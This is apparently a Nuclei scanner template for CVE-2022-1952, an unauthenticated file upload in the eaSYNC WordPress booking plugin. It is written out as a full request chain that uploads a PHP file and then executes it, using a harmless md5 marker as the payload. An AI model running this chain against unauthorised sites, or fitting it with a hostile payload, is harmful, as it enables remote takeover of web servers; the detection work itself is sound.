id: CVE-2022-1952

info:
  name: eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    The Free Booking Plugin for Hotels, Restaurant and Car Rental WordPress plugin before 1.1.16 suffers from insufficient input validation which leads to arbitrary file upload and subsequently to remote code execution. An AJAX action accessible to unauthenticated users is affected by this issue. An allowlist of valid file extensions is defined but is not used during the validation steps.
  reference:
    - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
    - https://wordpress.org/plugins/easync-booking/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1952
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1952
    cwe-id: CWE-434
  metadata:
    verified: true
  tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
        Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059

        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="action"

        easync_session_store
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="type"

        car
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="with_driver"

        self-driven
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5('CVE-2022-1952');?>

        --------------------------98efee55508c5059--

      - |
        GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37

      - |
        GET /wp-content/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - contains(all_headers_3, "text/html")
          - status_code_3 == 200
          - contains(body_1, 'success\":true')
          - contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
        condition: and

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
        internal: true